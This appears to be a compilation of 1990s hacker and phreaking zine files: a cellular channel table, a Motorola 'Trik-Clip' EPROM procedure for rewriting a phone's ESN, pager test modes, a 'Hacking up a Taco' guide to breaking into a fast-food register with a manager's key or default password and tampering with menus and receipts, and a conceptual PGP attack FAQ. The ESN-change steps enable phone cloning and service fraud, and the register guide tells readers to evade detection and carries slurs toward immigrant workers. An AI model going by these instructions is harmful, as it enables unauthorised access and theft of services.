Tx 890.01 Rx 845.01 Chan 0667 #667
Tx 890.04 Rx 845.04 Chan 0668 #668
Tx 890.07 Rx 845.07 Chan 0669 #669
Tx 890.10 Rx 845.10 Chan 0670 #670
Tx 890.13 Rx 845.13 Chan 0671 #671
Tx 890.16 Rx 845.16 Chan 0672 #672
Tx 890.19 Rx 845.19 Chan 0673 #673
Tx 890.22 Rx 845.22 Chan 0674 #674
Tx 890.25 Rx 845.25 Chan 0675 #675
Tx 890.28 Rx 845.28 Chan 0676 #676
Tx 890.31 Rx 845.31 Chan 0677 #677
Tx 890.34 Rx 845.34 Chan 0678 #678
Tx 890.37 Rx 845.37 Chan 0679 #679
Tx 890.40 Rx 845.40 Chan 0680 #680
Tx 890.43 Rx 845.43 Chan 0681 #681
Tx 890.46 Rx 845.46 Chan 0682 #682
Tx 890.49 Rx 845.49 Chan 0683 #683
Tx 890.52 Rx 845.52 Chan 0684 #684
Tx 890.55 Rx 845.55 Chan 0685 #685
Tx 890.58 Rx 845.58 Chan 0686 #686
Tx 890.61 Rx 845.61 Chan 0687 #687
Tx 890.64 Rx 845.64 Chan 0688 #688
Tx 890.67 Rx 845.67 Chan 0689 #689
Tx 890.70 Rx 845.70 Chan 0690 #690
Tx 890.73 Rx 845.73 Chan 0691 #691
Tx 890.76 Rx 845.76 Chan 0692 #692
Tx 890.79 Rx 845.79 Chan 0693 #693
Tx 890.82 Rx 845.82 Chan 0694 #694
Tx 890.85 Rx 845.85 Chan 0695 #695
Tx 890.88 Rx 845.88 Chan 0696 #696
Tx 890.91 Rx 845.91 Chan 0697 #697
Tx 890.94 Rx 845.94 Chan 0698 #698
Tx 890.97 Rx 845.97 Chan 0699 #699
Tx 891.00 Rx 846.00 Chan 0700 #700
Tx 891.03 Rx 846.03 Chan 0701 #701
Tx 891.06 Rx 846.06 Chan 0702 #702
Tx 891.09 Rx 846.09 Chan 0703 #703
Tx 891.12 Rx 846.12 Chan 0704 #704
Tx 891.15 Rx 846.15 Chan 0705 #705
Tx 891.18 Rx 846.18 Chan 0706 #706
Tx 891.21 Rx 846.21 Chan 0707 #707
Tx 891.24 Rx 846.24 Chan 0708 #708
Tx 891.27 Rx 846.27 Chan 0709 #709
Tx 891.30 Rx 846.30 Chan 0710 #710
Tx 891.33 Rx 846.33 Chan 0711 #711
Tx 891.36 Rx 846.36 Chan 0712 #712
Tx 891.39 Rx 846.39 Chan 0713 #713
Tx 891.42 Rx 846.42 Chan 0714 #714
Tx 891.45 Rx 846.45 Chan 0715 #715
Tx 891.48 Rx 846.48 Chan 0716 #716
Tx 891.51 Rx 846.51 Chan 0717 #717
Tx 891.54 Rx 846.54 Chan 0718 #718
Tx 891.57 Rx 846.57 Chan 0719 #719
Tx 891.60 Rx 846.60 Chan 0720 #720
Tx 891.63 Rx 846.63 Chan 0721 #721
Tx 891.66 Rx 846.66 Chan 0722 #722
Tx 891.69 Rx 846.69 Chan 0723 #723
Tx 891.72 Rx 846.72 Chan 0724 #724
Tx 891.75 Rx 846.75 Chan 0725 #725
Tx 891.78 Rx 846.78 Chan 0726 #726
Tx 891.81 Rx 846.81 Chan 0727 #727
Tx 891.84 Rx 846.84 Chan 0728 #728
Tx 891.87 Rx 846.87 Chan 0729 #729
Tx 891.90 Rx 846.90 Chan 0730 #730
Tx 891.93 Rx 846.93 Chan 0731 #731
Tx 891.96 Rx 846.96 Chan 0732 #732
Tx 891.99 Rx 846.99 Chan 0733 #733
Tx 892.02 Rx 847.02 Chan 0734 #734
Tx 892.05 Rx 847.05 Chan 0735 #735
Tx 892.08 Rx 847.08 Chan 0736 #736
Tx 892.11 Rx 847.11 Chan 0737 #737
Tx 892.14 Rx 847.14 Chan 0738 #738
Tx 892.17 Rx 847.17 Chan 0739 #739
Tx 892.20 Rx 847.20 Chan 0740 #740
Tx 892.23 Rx 847.23 Chan 0741 #741
Tx 892.26 Rx 847.26 Chan 0742 #742
Tx 892.29 Rx 847.29 Chan 0743 #743
Tx 892.32 Rx 847.32 Chan 0744 #744
Tx 892.35 Rx 847.35 Chan 0745 #745
Tx 892.38 Rx 847.38 Chan 0746 #746
Tx 892.41 Rx 847.41 Chan 0747 #747
Tx 892.44 Rx 847.44 Chan 0748 #748
Tx 892.47 Rx 847.47 Chan 0749 #749
Tx 892.50 Rx 847.50 Chan 0750 #750
Tx 892.53 Rx 847.53 Chan 0751 #751
Tx 892.56 Rx 847.56 Chan 0752 #752
Tx 892.59 Rx 847.59 Chan 0753 #753
Tx 892.62 Rx 847.62 Chan 0754 #754
Tx 892.65 Rx 847.65 Chan 0755 #755
Tx 892.68 Rx 847.68 Chan 0756 #756
Tx 892.71 Rx 847.71 Chan 0757 #757
Tx 892.74 Rx 847.74 Chan 0758 #758
Tx 892.77 Rx 847.77 Chan 0759 #759
Tx 892.80 Rx 847.80 Chan 0760 #760
Tx 892.83 Rx 847.83 Chan 0761 #761
Tx 892.86 Rx 847.86 Chan 0762 #762
Tx 892.89 Rx 847.89 Chan 0763 #763
Tx 892.92 Rx 847.92 Chan 0764 #764
Tx 892.95 Rx 847.95 Chan 0765 #765
Tx 892.98 Rx 847.98 Chan 0766 #766
Tx 893.01 Rx 848.01 Chan 0767 #767
Tx 893.04 Rx 848.04 Chan 0768 #768
Tx 893.07 Rx 848.07 Chan 0769 #769
Tx 893.10 Rx 848.10 Chan 0770 #770
Tx 893.13 Rx 848.13 Chan 0771 #771
Tx 893.16 Rx 848.16 Chan 0772 #772
Tx 893.19 Rx 848.19 Chan 0773 #773
Tx 893.22 Rx 848.22 Chan 0774 #774
Tx 893.25 Rx 848.25 Chan 0775 #775
Tx 893.28 Rx 848.28 Chan 0776 #776
Tx 893.31 Rx 848.31 Chan 0777 #777
Tx 893.34 Rx 848.34 Chan 0778 #778
Tx 893.37 Rx 848.37 Chan 0779 #779
Tx 893.40 Rx 848.40 Chan 0780 #780
Tx 893.43 Rx 848.43 Chan 0781 #781
Tx 893.46 Rx 848.46 Chan 0782 #782
Tx 893.49 Rx 848.49 Chan 0783 #783
Tx 893.52 Rx 848.52 Chan 0784 #784
Tx 893.55 Rx 848.55 Chan 0785 #785
Tx 893.58 Rx 848.58 Chan 0786 #786
Tx 893.61 Rx 848.61 Chan 0787 #787
Tx 893.64 Rx 848.64 Chan 0788 #788
Tx 893.67 Rx 848.67 Chan 0789 #789
Tx 893.70 Rx 848.70 Chan 0790 #790
Tx 893.73 Rx 848.73 Chan 0791 #791
Tx 893.76 Rx 848.76 Chan 0792 #792
Tx 893.79 Rx 848.79 Chan 0793 #793
Tx 893.82 Rx 848.82 Chan 0794 #794
Tx 893.85 Rx 848.85 Chan 0795 #795
Tx 893.88 Rx 848.88 Chan 0796 #796
Tx 893.91 Rx 848.91 Chan 0797 #797
Tx 893.94 Rx 848.94 Chan 0798 #798
Tx 893.97 Rx 848.97 Chan 0799 #799
Upper Set Part 2 (991-1023)
Tower Freq. Mobile Freq. 11xxxx# Channel
Tx 869.04 Rx 824.04 Chan 0991 #800
Tx 869.07 Rx 824.07 Chan 0992 #801
Tx 869.10 Rx 824.10 Chan 0993 #802
Tx 869.13 Rx 824.13 Chan 0994 #803
Tx 869.16 Rx 824.16 Chan 0995 #804
Tx 869.19 Rx 824.19 Chan 0996 #805
Tx 869.22 Rx 824.22 Chan 0997 #806
Tx 869.25 Rx 824.25 Chan 0998 #807
Tx 869.28 Rx 824.28 Chan 0999 #808
Tx 869.31 Rx 824.31 Chan 1000 #809
Tx 869.34 Rx 824.34 Chan 1001 #810
Tx 869.37 Rx 824.37 Chan 1002 #811
Tx 869.40 Rx 824.40 Chan 1003 #812
Tx 869.43 Rx 824.43 Chan 1004 #813
Tx 869.46 Rx 824.46 Chan 1005 #814
Tx 869.49 Rx 824.49 Chan 1006 #815
Tx 869.52 Rx 824.52 Chan 1007 #816
Tx 869.55 Rx 824.55 Chan 1008 #817
Tx 869.58 Rx 824.58 Chan 1009 #818
Tx 869.61 Rx 824.61 Chan 1010 #819
Tx 869.64 Rx 824.64 Chan 1011 #820
Tx 869.67 Rx 824.67 Chan 1012 #821
Tx 869.70 Rx 824.70 Chan 1013 #822
Tx 869.73 Rx 824.73 Chan 1014 #823
Tx 869.76 Rx 824.76 Chan 1015 #824
Tx 869.79 Rx 824.79 Chan 1016 #825
Tx 869.82 Rx 824.82 Chan 1017 #826
Tx 869.85 Rx 824.85 Chan 1018 #827
Tx 869.88 Rx 824.88 Chan 1019 #828
Tx 869.91 Rx 824.91 Chan 1020 #829
Tx 869.94 Rx 824.94 Chan 1021 #830
Tx 869.97 Rx 824.97 Chan 1022 #831
Tx 870.00 Rx 825.00 Chan 1023 #832 or #0
T*R*I*K*-*C*L*I*P********************************************S*E* C*T*I*O*N***1*0
I got this from a bbs in the (708) are code. It had no name associated
with it. Since NOONE has mailed me any other info on it, I will keep this
in the bible until someone bitches or sends me something tangible. Besides,
with Loadkit so readily available, who has the time to mess with it?
-ML
MOTOROLA "TRIK-CLIP"
This is the plans I recieved for the Flip. Supposedly if one knew the
pinouts on the other moto phones one could transpose. (maybe!) I never
tested this so I don't know if it works. The chip in the flip the text
is talking about is a 32 pin square plcc
After Phone Disassembly Locate 27c512 Eprom on phone board. This is
On The Upper Right Side Of The Display Next To The Roam Indicator.
This Is a 32 pin Square device. **Note the dot and beveled edge
for pin orientation (the dot is pin 1) Count to the left
counter clock wise 2 3 4 5 and so on. To the Right or clockwise
of the dot is pin 32 Vcc. This will aid you in your count to find
pin 25 which is the eprom output enable. This pin is at ground or
Vss - Level. **Note Pin 25 on Eprom in phone must be lifted from
the phone board ground or Vss state. Use an X-acto Knife and or
soldering iron and tools to cut pin at board level where pin
narrows. Do not bend wide part of pin up on eprom as this could
break off of Eprom. Also Wide Part of pin Will be used to make
contact with eprom test clip adapter. The eprom test clip adapter
will take pin 25 to logic high through an 8 to 10 thousand
resistor to pin 32 Vcc. This will Gate off all data Commands from
the phone board eprom and allow the eprom test clip adaptor to
take over. **Note test clip could touch narrow part of cut off
pin on board and cause phone not to power up please remove or fold
down as low as possible so test clip only touches side of eprom.
After programing is complete put pin 25 back together or find a
suitable ground or Vss - source. The phone will power up and work
without pin 25 put back together but for long term precaution
put back to a logic zero or ground to enable the output enable.
To use the eprom test clip adapter pull the locking wedge on the
test clip into the upper postition. Seat the eprom test clip adapter
onto the eprom in the phone. Make sure to orient the dot and
beveled edge with each other. Push the locking wedge down to lock
the the eprom test clip adapter onto the eprom in the phone. Hook up
the programing cable to the computer and plug into the jack on the
base of the phone. Also hook up the loose lead with a jumper to the
center terminal between the battery contacts. Turn power on green
light on phone display should come on thgen a complete display test
will light up after that the no service will blink along with the
signal level mark in corner of display. If the antenna is still on
the phone it could change to roam or something else. I suggest
remove the antenna so the cell sight will not see you. If you do
not get a power on test with the display there are 3 possible
things (1) pin 25 on phone board is touching the test clip this
can be checked by looking with a volt meter at pin 25 where
resistor connects for 4 to 5 volts pos with reference to ground.
(2) Test clip is not sitting on chip good some times you have pull
the test clip up off of the eprom a 64th of an inch all the way
around. (3) there is corrupt data, Pull the eprom test clip off
Phone check to see if power on display is there.
Computer see if data or phone number or cell sight code or data
whole is ok I've seen the cell sight ID corrrupt and the phone play
dead on the power on test. The test clip sometimes needs
maintenance look at the gold pins.
Make sure all the pins are level with the edge of it. If not take
an X-acto or pin and lightly bend them out so they are along the
edge of the plastic of the test clip.
Always check to see if eprom in phone contacts are clean before
putting test clip on. **Note when test clip is on phone - only
change the ESN only. *The other data phone number lock and so on
can be changed without the test clip and and should be done so.
The software version in the test clip is 9148 you will see this in
the right corner of the computer. Sometimes the program will crash
during the ESN write this will put all zeros in the ESN field
check the test clip try again. Sometimes I've had to do this 3 or 4
times. Also watch the phone display for codes I've seen at the end
of a wright the code (FO8) just before power down I've had no
problem there but during the key wright (FO8) means i've crashed.
Also during the time when the program is counting back into the
phone i've had (F1O) show up in the display of the phone this
problem means the next time you may not get the power on display
test pull test clip read phone check data to see if cell sight
code is corrupt or some other data correct try again. A word of
caution do not push on eprom on top of test clip as this could
seat eprom lower into adapter and cause bad contact. To remove
test clip pull locking wedge up to unlock the eprom test clip
adapter from the eprom in the phone. Continue pulling up to lift
the eprom test clip adapter from the eprom in the phone.
P*A*G*E*R*S**************************************************S*E* C*T*I*O*N***1*1
STRAIGHT FROM A CELLULAR ONE DEALER DUMPSTER!!! Date Dec 8, 1995
(appears EXACTLY like it is on the fax)
CAP code, which is the pager's ESN, can be found in 2 places:
1) The back of the pager (bar code)
For example:
1st number: 929.7125 = frequency
2nd number: 1234567 = CAP code
3rd number: 12345678 9s = Factory serial number
or
2) When the pager is off: press top button twice
and view CAP code, press a 3rd time and
view frequency
This fax didn't say what type of pager it is, so let me know when you try this
if it worked or not.
----------------------------------------------------------------- ---------------
Subject: BRAVO pagers - undocumented test features
SELF TEST:
TO PUT UNIT INTO A SELF TEST TURN OFF PAGER. NOW HOLD DOWN THE
GRAY ARROW KEY AND BLACK LOCK KEY AT THE SAME TIME AND TURN ON
PAGER. THIS TELLS THE CPU IN PAGER TO GO INTO A SELF TEST. YOU WILL
GET A 2 SECOND LONG BEEP, RELEASE THE GRAY & BLACK BUTTON AND PUSH
THE GRAY BUTTON BEFORE THE 2 SECOND BEEP ENDS. IF YOU DID ALL THIS
IN TIME YOU WILL HAVE "SPL" OR "PAGING P?" AND NOT THE DOTTED LINE
YOU ARE USED TO SEEING WHEN YOU TURN ON PAGER . BY PRESSING THE
GRAY KEY IT WILL GO TO A DISPLAY TEST, PRESS AGAIN AND YOU WILL GET
THE PAGERS CAPCODE (CAPCODE IS THE UNIQUE SERIAL NUMBER WHICH THE
PAGING TRANSMITTERS TRANSMITS TO YOUR PAGER TO TURN ON YOUR PAGER
WHEN SOMEONE PAGES YOU). WAIT AND IN ABOUT 3 SECONDS IT WILL
DISPLAY YOUR SECOND CAPCODE (IF YOU HAVE ONE-MOST DON'T) PRESS THE
GRAY KEY AGAIN AND IT WILL CHECK CONTROLS, PRESS IT AGAIN AND IT
WILL TEST VIBRATOR FUNCTION (IF YOUR PAGER HAS IT). TURN OFF PAGER
AND TURN ON AGAIN TO DISABLE SELF TEST.
SPECIAL PROGRAMMED FEATURES:
TAKE OFF BATTERIES CLIP AND IN CENTER TOWARD THE FRONT OF
PAGER YOU WILL SEE A PRINTED CIRCUIT BOARD EDGE PINS (JUST LIKE THE
BACK SIDE OF A NETENDO CARTAGE. THIS EDGE PINS ARE PLUGGED INTO A
CORE PROGRAMMER. THE PROGRAMMER CAN CHANGE.
CAPCODES: SEE ABOVE
AUTORESET TO MANUAL: YOUR PAGER IN AUTORESET WILL BEEP 8 TIMES
THEN STOP BEEPING. MANUAL RESET THE BEEPER WILL KEEP BEEPING TILL
THE COWS COME HOME OR YOU PUSH A BUTTON TO LOOK AT THE MESSAGE.
DISPLAY: ENGLISH PROMPTS OR INTERNATIONAL-SYMBOL SCREENS
DISPLAYED.
SILENT MODE CHIRP: FOR A SINGLE BEEP WHEN YOUR PAGED. NOT FOR
USE ON VIBRATOR PAGERS.
BEEP ON BAD DATA: YOUR PAGER HEARS IT'S CAPCODE BUT RECEIVED
BAD DISPLAY MESSAGE, IT WILL PUT "EEE" ACROSS DISPLAY TO SHOW BAD
RECEIVE. IF THIS IS FEATURE IS NOT ENABLED AND YOU RECEIVE BAD DATA
YOUR PAGER WILL NOT BEEP AND YOU WILL HAVE NO IDEA SOMEONE TRYED TO
PAGE YOU.
***************************************************************** *
NOW LETS SAY YOU ARE UNHAPPY WITH YOUR PAGING COMPANY "A" BUT OWN
YOUR PAGER. YOUR $200.00+ PAGER IS TUNED TO THEIR FREQUENCY AND YOU
WANT TO GO TO ANOTHER PAGING COMPANY BUT NOT LOSE ALL THE MONEY YOU
SPENT FOR YOUR PAGER. THE ANSWER IS TO RECRYSTAL PAGER TO THE NEW
FREQUENCY OF COMPANY "B". BUT WE MUST ANSWER SOME QUESTIONS FIRST
TO SEE WHAT IT WILL COST.
1. WHAT IS YOUR PAGERS CODING FORMAT (POCSAG) OR (GSC)
THE EASY WAY TO TELL IS TO DO A SELF TEST AND READ
CAPCODE. IF IT'S 7 NUMBERS IT'S POCSAG. IF IT'S 6 NUMBERS
AND 1 LETTER IT'S GSC. IF YOUR PAGER DOES NOT MATCH THE
SAME CODING FORMAT AS COMPANY "B" IT WILL COST MORE THEN
IT'S WORTH TO CHANGE.
2. WHAT BAUD RATE IS YOUR PAGER WORKING AT ? DO SELF TEST AND
IF DISPLAY SHOWS PAGING P1 PAGER IS WORKING AT 1200 BAUD OTHER WISE
YOU ARE SAFE TO ASSUME 512 BAUD IT MUST MATCH COMPANY "B" BAUD RATE
TO BE WORTH YOUR TIME.
3. ARE YOU IN THE SAME FREQUENCY BAND 931 MHZ OR 450 MHZ ETC.
IF COMPANY "A" AND COMPANY "B" ARE NOT IN SAME BAND IT WILL TAKE A
NEW RECEIVER BOARD TO CONVERT PAGER AND COST TO MUCH TO TRY.
IF ALL THE ANSWERS ABOVE SHOW YOU ARE COMPATIBLE YOU CAN CALL
COMPANY "B" AND TELL THEM YOU WANT TO DO BUSINESS WITH THEM AND
NEED A CAPCODE NUMBER SO YOU CAN GET PAGER RECRYSTALED AND HAVE A
CAPCODE PROGRAMMED AT THE SAME TIME.
NOW YOU CAN HAVE COMPANY "B" RECOMMEND A SHOP THAT WILL
RECRYSTAL PAGER OR LOOK UP ONE YOURSELF.
(sorry for the all caps, that was how I received it and I am lazy. )
D*I*S*C*L*A*I*M*E*R******************************************S*E* C*T*I*O*N***1*2
DISCLAIMER: I accept NO responsibility for people using any
info within this text for fraudulant purposes. I did not intend for the info
to be used towards fraud or theft of services. The main reason I spent
hundreds of hours creating and compiling this information is because
programming fees are BULLSHIT and they know it.
Oh, by the way, I forgot to mention in the above disclaimer that I do
nothing fraudulant with MY fone. I pay a bill and everything and can prove
it. So will the "feds" or whoever the Internet gestapo is that's been sending
me mail about me being under their "watchful eye", please go for someone else
that's dealing child pornography or asking for WaReZ? Thanks.
The sole reason I compiled this info into book form is to let people
that are capable, work on their phone. I did not compile this for the sole
purpose of fraud. There is a company in Illinois called BIG BOYZ TOYZ who are
a bunch of complete FUCKZ who refused to give me my security code and/or
programing manual. Phrack published a tidbit about it a few issues back and
I figured if I was going to go through all the trouble of learning all of this,
I might as well let everybody share it. By the way, if you ever see a BIG
BOYZ TOYZ store, they charge WAY too much for everything and will go for list
price unless you know the going price.
quinton.mchale@scinexus.com
******T*H*E***E*N*D*****T*H*E***E*N*D******T*H*E***E*N*D*****T*H* E***E*N*D******
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #7, File #5 of 9
Hacking up a Taco
The Midnight Marauder
Disclaimer: This file should be read for entertainment only, all the names
are ficticious, any similarities to real life corporations which hire illegal
immigrants is purely coincidental.
It's almost two in the morning, about half of your dime bag is gone,
your friends didn't chip in as usual, and once again you realize: It's never
too late to get the munchies!
Next thing you know you're in a car with ten too many screaming
juvenile delinquents, on your way to your local Mexican fast food place: you
guessed it. Taco Hell! As you pull up to the Drive Thru and grab your
ten light tacos with extra fat, you glance over the counter at the terminal
the underpaid illegal alien is on, and as you are a bit of a computer hobbyist
yourself, wonder what might happen if you were standing at that terminal.
What havoc could be wreaked if that power were to fall into the wrong hands?
Let's take a glimpse. Anyone who has access to a Taco Hell computer
could figure most of this out for themselves, there is nothing hard about
"hacking" these things. But for the rest of us, I thought it would be fairly
interesting.
This file applies only to the older Taco Hell computers, not the ones
which have touch screens, the old monochrome green ones that the manager must
stick the key in. Normally, the terminal is simply a cash register. But
every so often, you might see the manager stick his key in, and boom! The
terminal becomes an opportunity to make the system submit to your every whim.
To play with the computers, you must actually have a manager's key
(which is not too hard to get a hold of) or something shaped like the managers
key, which will trip the sensors inside the hole. The screen then changes to
another, which has four large asteriks on it, ****. You must now input one
of the stores 10 four character pass words. This is done using the menu key
board, which also has small letters and numbers written on each key, which
you will use once you get into the system. Once you see the keyboard, you
will understand what I am taking about. One of the keys might look like
CK BUR
a
Where that key would produce an a in this mode. The numbers, of
course, are input using the regular key pad. If you don't know a password
(the managers normally tell them to anyone willing to listen) the default is
0000, but this is normally on the lowest authorization level. Try the first
four letters of every managers name, and the store number. Once you get in,
you have bypassed every security measure on the system. You can now play with
employee hours, and the menu!
Every password has an authorization level from one to ten. This
controls what you can and cannot change. To find out what authorization
number you have, on the first menu type 2 for password information, and at
the second menu, type 1 to see, or change if you can, your authorization level.
Set this level at 0 if you can change it, because then you can use the 0000
default to get in, and then change it. At this menu type 2 to change your
password, if you really want to fuck a manager over.
The system is really self explanatory once you get in. Type enter to
page through the menus, and check out all the goodies. You can change just
about everything on the computer that you want too, the time so you can get
out early, the menu, receipts. I'll go over a couple here just so if you are
totally beyond help, you can have some fun too.
First of all, the funniest. Changing menu items. At the first menu,
choose 6 for Menu item key. Choose 0 next, to choose the type of menu item,
make it 10. Then choose 1 to name your item, let's make it a Trent Burger.
Then you need to choose what key on the menu board it will be. Then you're
home free! The illegal aliens who make the food won't no the difference when
it pops up on their screens, so imagine the fun you can have when your friends
show up, order ten chicken burritoes, and go home with a taco ten pack of
Trent burgers!
You want to change the receipt? This can be really funny. At the
main menu choose 7 for literals/prompts. Next choose 2 for screen receipt.
You can now type in whatever you want to be on the receipt! Let's make it
***********
Trent was here
***********
Imagine everyone leaving your Taco Hell knowing that Trent had been
there!
When you are done, leave the keys on the managers desk, so that he
feels like a real idiot after he's been interrogating everyone in the store
to find out where he left them. Then don't forget to douse the terminal with
hot sauce to destroy any incriminating finger prints you may have left behind.
I prefer to remain anonymous, to save myself from any harrasment large
taco producers would like to inflict upon me because of my knowledge. If you
have any questions about this file, just ask your store manager, but if you
really must talk to me, I can be reached through Revolution.
----------------------------------------------------------------- -------------
A secure computer is like a goal in hockey; The
everybody takes your word for it, Midnight
but nobody's really ever seen one. Marauder
----------------------------------------------------------------- -------------
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #7, File #6 of 9
The PGP attack FAQ v.2.0
By: infiNity
--[Abstract]--
PGP is the most widely used hybrid cryptosystem around today. There
have been AMPLE rumours regarding it's security (or lack there of). There
have been rumours ranging from PRZ was coerced by the Gov't into placing
backdoors into PGP, that the NSA has the ability to break RSA or IDEA in a
reasonable amount of time, and so on. While I cannot confirm or deny these
rumours with 100% certianty, I really doubt that either is true. This FAQ
while not in the 'traditional FAQ format' answers some questions about the
security of PGP, and should clear up some rumours...
This FAQ is also available from the web:
http://axion.physics.ubc.ca/pgp-attack.html
http://ucsu.colorado.edu/~cantrick/pgphafaq.html
http://www.lava.net/~jordy/PGPAttackFAQ.html
http://www.stack.urc.tue.nl/~galactus/remailers/attack-faq.html
[ The Feasibility of Breaking PGP ]
[ The PGP attack FAQ ]
2/96 v. 2.0
by infiNity [daemon9@netcom.com / route@infonexus.com]
-- [Brief introduction] --
There are a great many misconceptions out there about how
vulnerable Pretty Good Privacy is to attack. This FAQ is designed
to shed some light on the subject. It is not an introduction to
PGP or cryptography. If you are not at least conversationally
versed in either topic, readers are directed to The Infinity Concept
issue 1, and the sci.crypt FAQ. Both documents are available via
ftp from infonexus.com. This document can be found there
as well:
URL:ftp://ftp.infonexus.com/pub/Philes/Cryptography/PGP/PGPattack FAQ.gz
PGP is a hybrid cryptosystem. It is made up of 4 cryptographic
elements: It contains a symmetric cipher (IDEA), an asymmetric cipher
(RSA), a one-way hash (MD5), and a random number generator (Which is
two-headed, actually: it samples entropy from the user and then
uses that to seed a PRNG). Each is subject to a different form of
attack.
1 -- [The Symmetric Cipher] -- 1
IDEA, finalized in 1992 by Lai and Massey is a block cipher that
operates on 64-bit blocks of data. There have been no advances
in the cryptanalysis of standard IDEA that are publically known.
(I know nothing of what the NSA has done, nor does most anyone.)
The only method of attack, therefore, is brute force.
-- Brute Force of IDEA --
As we all know the keyspace of IDEA is 128-bits. In base 10
notation that is:
340,282,366,920,938,463,463,374,607,431,768,211,456.
To recover a particular key, one must, on average, search half the
keyspace. That is 127 bits:
170,141,183,460,469,231,731,687,303715,884,105,728.
If you had 1,000,000,000 machines that could try 1,000,000,000
keys/sec, it would still take all these machines longer than the
universe as we know it has existed and then some, to find the key.
IDEA, as far as present technology is concerned, is not vulnerable to
brute-force attack, pure and simple.
-- Other attacks against IDEA --
If we cannot crack the cipher, and we cannot brute force the
key-space, what if we can find some weakness in the PRNG used
by PGP to generate the psuedo-random IDEA session keys? This
topic is covered in more detail in section 4.
2 -- [The Asymmetric Cipher] -- 2
RSA, the first full fledged public key cryptosystem was designed
by Rivest, Shamir, and Adleman in 1977. RSA gets it's security from
the apparent difficulty in factoring very large composites.
However, nothing has been proven with RSA. It is not proved
that factoring the public modulous is the only (best) way to
break RSA. There may be an as yet undiscovered way to break it.
It is also not proven that factoring *has* to be as hard as it is.
There exists the possiblity that an advance in number theory may lead
to the discovery of a polynomial time factoring algorithm. But, none
of these things has happened, and no current research points in that
direction. However, 3 things that are happening and will continue
to happen that take away from the security of RSA are: the advances
in factoring technique, computing power and the decrease in the
cost of computing hardware. These things, especially the first one,
work against the security of RSA. However, as computing power
increases, so does the ability to generate larger keys. It is *much*
easier to multiply very large primes than it is to factor the
resulting composite (given today's understanding of number theory).
-- The math of RSA in 7 fun-filled steps --
To understand the attacks on RSA, it is important to understand
how RSA works. Briefly:
- Find 2 very large primes, p and q.
- Find n=pq (the public modulous).
- Choose e, such that e<n and relatively prime to (p-1)(q-1).
- Compute d=e^-1 mod[(p1-)(q-1)] OR ed=1[mod (p-1)(q-1)].
- e is the public exponent and d is the private one.
- The public-key is (n,e), and the private key is (n,d).
- p and q should never be revealed, preferably destroyed (PGP
keeps p and q to speed operations by use of the Chinese Remainder
Theorem, but they are kept encrypted)
Encryption is done by dividing the target message into blocks
smaller than n and by doing modular exponentiation:
c=m^e mod n
Decryption is simply the inverse operation:
m=c^d mod n
-- Brute Force RSA Factoring --
An attacker has access to the public-key. In other words, the
attacker has e and n. The attacker wants the private key. In
other words the attacker wants d. To get d, n needs to be
factored (which will yield p and q, which can then be used to
calculate d). Factoring n is the best known attack against RSA to
date. (Attacking RSA by trying to deduce (p-1)(q-1) is no easier
than factoring n, and executing an exhaustive search for values of d
is harder than factoring n.) Some of the algorithms used for
factoring are as follows:
- Trial division: The oldest and least efficient. Exponential
running time. Try all the prime numbers <= sqrt(n).
- Quadratic Sieve (QS): The fastest algorithm for numbers smaller
than 110 digits.
- Multiple Polynomial Quadratic Sieve (MPQS): Faster version of QS.
- Double Large Prime Variation of the MPQS: Faster still.
- Number Field Sieve (NFS): Currently the fastest algorithm known for
numbers larger than 110 digits. Was used to factor the ninth Fermat
number.
These algorithms represent the state of the art in warfare against
large composite numbers (therefore agianst RSA). The best algorithms
have a super-polynomial (sub-exponential) running time, with the NFS
having an asypmtotic time estimate closest to polynomial behaivior.
Still, factoring large numbers is hard. However, with the advances
in number theory and computing power, it is getting easier. In 1977
Ron Rivest said that factoring a 125-digit number would take
40 quadrillion years. In 1994 RSA129 was factored using about
5000 MIPS-years of effort from idle CPU cycles on computers across
the Internet for eight months. In 1995 the Blacknet key (116 digits)
was factored using about 400 MIPS-years of effort (1 MIPS-year is
a 1,000,000 instruction per second computer running for one year)
from several dozen workstations and a MasPar for about three months.
Given current trends the keysize that can be factored will only
increase as time goes on. The table below estimates the effort
required to factor some common PGP-based RSA public-key modulous
lengths using the General Number Field Sieve:
KeySize MIPS-years required to factor
-----------------------------------------------------------------
512 30,000
768 200,000,000
1024 300,000,000,000
2048 300,000,000,000,000,000,000
The next chart shows some estimates for the equivalences in brute
force key searches of symmetric keys and brute force factoring
of asymmetric keys, using the NFS.
Symmetric Asymmetric
----------------------------------------------------------------- -
56-bits 384-bits
64-bits 512-bits
80-bits 768-bits
112-bits 1792-bits
128-bits 2304-bits
It was said by the 4 men who factored the Blacknet key that
"Organizations with 'more modest' resources can almost certainly
break 512-bit keys in secret right now." This is not to say
that such an organization would be interested in devoting so
much computing power to break just anyone's messages. However, most
people using cryptography do not rest comfortably knowing the
system they trust their secrets to can be broken...
My advice as always is to use the largest key allowable by the
implementation. If the implementation does not allow for large
enough keys to satisfy your paranoia, do not use that implementation.
-- PGP's Handling of Prime Numbers --
RSA gets it's security from the presumed difficulty in factoring
large prime numbers. So, PGP needs some way of generating large
prime numbers. As it turns out, there is no way to feasibly
generate large primes. So, what PGP does,is generate large odd
numbers and test them for primality.
By the way, there *are* in fact, an infinite amount of prime numbers.
Probably more than you would first suspect. The prime number theorem
gives a useful approximation for the prime distribution function
PI(n); which specifies the number of primes <=n:
limit
n --> infinity PI(n) / [ n / (ln (n) )] == 1
So, the approximation n/ln n gives with reasonable accuracy, the
density of primes less than or equal to n:
There are 17 prime numbers from 1-60.
60 / ln(60) = 14.65
An error of about 8% (this is not linear, however).
To test a candidate number (n) for primality, one obvious and simple
method is to try trial divisions. Try dividing n by each integer
2,3,...,sqrt(n). If n is prime, none of the trial divisors will
divide it. Assuming each division takes constant time, this method
has a worst case running time (if n is in fact prime) proportional to
exponential, in the length of n. If n is non-trivial (which is the
case for the PGP's candidate numbers) this approach is not feasible
(this is also why trial division is not a viable method of attack
against RSA). (Trial divsion has the one advantage of determining the
prime factorization of n, however. But who wants to wait till the
Universe explodes (implodes)?)
-- Psuedo-Primality --
In order to test non-trivial candidates, PGP uses psuedo-primality
testing. Psuedo-primality tests take a candidate number and test
it for primality, returning with a certian degree of accuracy, whether
or not it's prime. PGP uses the 4 Fermat Tests to test the numbers
for primality.
-- The Four Fermat Tests --
- Candidate number to be tested for primality: n.
- Take the first 4 prime numbers b={2,3,5,7}
- Take b^(n-1) % n = w
- If w == 1; for all b, n is probably prime. Any other number and n is
definitely not prime.
While it *is* possible for a number to be reported as being prime
